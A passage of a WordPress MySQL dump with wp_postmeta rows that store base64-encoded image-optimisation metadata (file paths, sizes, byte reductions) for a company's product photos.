xNDgzNTY4NTkxLCJpZCI6MTUyMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01TLTE0M0FYLS0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01TLTE0M0FYLS0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01TLTE0M0FYLS0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODU5NCwiaWQiOjE1MjB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NUy0xNDNBWC0tMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NUy0xNDNBWC0tMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NUy0xNDNBWC0tMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg1OTYsImlkIjoxNTIwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTQzQVgtLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTQzQVgtLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTVMtMTQzQVgtLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4NTk4LCJpZCI6MTUyMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01TLTE0M0FYLS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01TLTE0M0FYLS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01TLTE0M0FYLS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODYwMSwiaWQiOjE1MjB9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29412, 1519, 'wpfc_optimisation_reduction', '2096279'); 
INSERT INTO `wp_postmeta` VALUES (29413, 1519, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTIyU0UtQWVyb3NwYWNlLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTIyU0UtQWVyb3NwYWNlLmpwZyIsIndpZHRoIjozNTAwLCJoZWlnaHQiOjIzMzQsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NUy0xMjJTRS1BZXJvc3BhY2UuanBnIiwicmVkdWN0aW9uIjoyMDk2MjY2LCJ0aW1lIjoxNDgzNTY4NjEyLCJpZCI6IjE1MTkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01TLTEyMlNFLUFlcm9zcGFjZS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01TLTEyMlNFLUFlcm9zcGFjZS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01TLTEyMlNFLUFlcm9zcGFjZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODYxNSwiaWQiOjE1MTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTIyU0UtQWVyb3NwYWNlLTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTIyU0UtQWVyb3NwYWNlLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTVMtMTIyU0UtQWVyb3NwYWNlLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4NjE4LCJpZCI6MTUxOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NUy0xMjJTRS1BZXJvc3BhY2UtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NUy0xMjJTRS1BZXJvc3BhY2UtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NUy0xMjJTRS1BZXJvc3BhY2UtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg2MjEsImlkIjoxNTE5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01TLTEyMlNFLUFlcm9zcGFjZS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NUy0xMjJTRS1BZXJvc3BhY2UtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01TLTEyMlNFLUFlcm9zcGFjZS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4NjI1LCJpZCI6MTUxOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NUy0xMjJTRS1BZXJvc3BhY2UtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NUy0xMjJTRS1BZXJvc3BhY2UtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NUy0xMjJTRS1BZXJvc3BhY2UtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg2MjcsImlkIjoxNTE5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01TLTEyMlNFLUFlcm9zcGFjZS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01TLTEyMlNFLUFlcm9zcGFjZS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01TLTEyMlNFLUFlcm9zcGFjZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODYzMCwiaWQiOjE1MTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTIyU0UtQWVyb3NwYWNlLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTIyU0UtQWVyb3NwYWNlLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTVMtMTIyU0UtQWVyb3NwYWNlLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4NjMyLCJpZCI6MTUxOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NUy0xMjJTRS1BZXJvc3BhY2UtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NUy0xMjJTRS1BZXJvc3BhY2UtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NUy0xMjJTRS1BZXJvc3BhY2UtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg2MzUsImlkIjoxNTE5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTIyU0UtQWVyb3NwYWNlLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTIyU0UtQWVyb3NwYWNlLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTVMtMTIyU0UtQWVyb3NwYWNlLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4NjM3LCJpZCI6MTUxOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01TLTEyMlNFLUFlcm9zcGFjZS0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01TLTEyMlNFLUFlcm9zcGFjZS0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01TLTEyMlNFLUFlcm9zcGFjZS0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODY0MCwiaWQiOjE1MTl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NUy0xMjJTRS1BZXJvc3BhY2UtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NUy0xMjJTRS1BZXJvc3BhY2UtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NUy0xMjJTRS1BZXJvc3BhY2UtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg2NDIsImlkIjoxNTE5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTIyU0UtQWVyb3NwYWNlLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTIyU0UtQWVyb3NwYWNlLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTVMtMTIyU0UtQWVyb3NwYWNlLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4NjQ1LCJpZCI6MTUxOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01TLTEyMlNFLUFlcm9zcGFjZS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01TLTEyMlNFLUFlcm9zcGFjZS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01TLTEyMlNFLUFlcm9zcGFjZS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODY0NywiaWQiOjE1MTl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29414, 1471, 'wpfc_optimisation_reduction', '1338299'); 
INSERT INTO `wp_postmeta` VALUES (29415, 1471, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0yLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0yLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTIuanBnIiwicmVkdWN0aW9uIjoxMzM4Mjg0LCJ0aW1lIjoxNDgzNTY4NjU5LCJpZCI6IjE0NzEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMi0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODY2MiwiaWQiOjE0NzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0yLTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0yLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0yLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4NjY1LCJpZCI6MTQ3MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTItNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTItNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTItNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg2NjgsImlkIjoxNDcxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMi0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTItMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMi0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4NjcyLCJpZCI6MTQ3MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTItMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg2NzQsImlkIjoxNDcxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODY3NywiaWQiOjE0NzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0yLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0yLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdGVmbG9uLXNl